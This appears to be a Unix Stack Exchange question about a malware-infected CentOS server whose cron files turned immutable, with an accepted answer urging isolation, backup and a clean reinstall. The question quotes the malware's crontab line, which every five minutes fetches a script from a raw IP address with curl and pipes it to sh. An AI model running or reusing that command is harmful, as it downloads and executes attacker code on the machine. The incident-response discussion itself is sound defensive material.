# Why are my crontab user files immutable and doesn't get executed even after changing attribute to mutable?

Tags: linux, centos, security, cron, malware

In a means to suppress a malware that created a crontab entry below, II introduced the usage of cron.deny

```
*/5 * * * * curl -fsSL http://62.109.20.220:38438/start.sh|sh
```

However, all user crontabs suddenly stopped triggering every job.
During troubleshooting, I observed all cron associated file for all users are not editable.

```
ls -lht /etc/cron.denyus    -rw----er--- 1 root root 5 May 23 11:51 /etc/cron.deny

ls -lht /var/spool/cron/root
-rw-r--r-- 1 root root 62 Jun 16 08:10 /var/spool/cron/root

chmod 775 /etc/cron.deny
chmod: changing permissions of `/etc/cron.deny': Operation not permitted

chmod 775 /var/spool/cron/root
chmod: changing permissions of `/var/spool/cron/root': Operation not permitted
```

I later found out they all have an immutable attribute.

```
lsattr /var/spool/cron/root
----i--------e- /var/spool/cron/root

lsattr /etc/cron.deny
----i--------e- /etc/cron.deny
```

I changed the immutable attribute using commands below:

```
chattr -i /etc/cron.deny
chattr -i /var/spool/cron/root
```

Yet the cron fails to trigger these jobs.

Comment: Did you also catch a `/etc/cron.allow` with your malware? Are the contents of `cron.deny` ok? (It is usually empty by default, and users listed in there will not be able to use `cron`.)

Comment: I set the /etc/cron.allow file too but I was hoping I could make crontab for root inaccessible which didn't work. I have decided to follow through with @Gilles and ensure more security (SELinux & firewall ACL) in future

Answer (score 4, accepted):

Stop there! Your system has been infected by a malware. At this point, you can't trust what your system says. The malware may have modified the kernel. What you see is what the malware wants you to see. The system may not behave consistently. Don't expect a file to be modified just because the editor saved it successfully, for example.

To reiterate, forget about understanding permissions, immutable attributes, etc. All that stuff is for a working system. On a compromised system, things do not behave in any consistent way.

What you need to do now is:

1. **Take the server offline immediately**. It may be infecting users with malware.
2. **Take a backup**. Don't erase any of your existing backups! You need a backup of the infected system for two reasons: to trace where the infection came from, and to ensure that you have the latest data.
3. **Figure out how you got infected**. This is important: if you bring the system back up with the same security hole as before, it'll get infected again.
4. **Install a new system from scratch**. You cannot reliably remove malware from a system. Malware tries to make this difficult, and you can never be sure that you out-tricked it.
   Make sure to install the latest security updates of all software, and to configure it securely, so that it won't get infected again.
5. **Restore your data**. Make sure that you restore only *data*, and not *vulnerable software*.

See also [How do I deal with a compromised server?](https://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server)

Comment: @Giles I will do as you have suggested, however, I wish to know the vulnerability of the system that allowed the malware in the first place, that is why I invested time troubleshooting.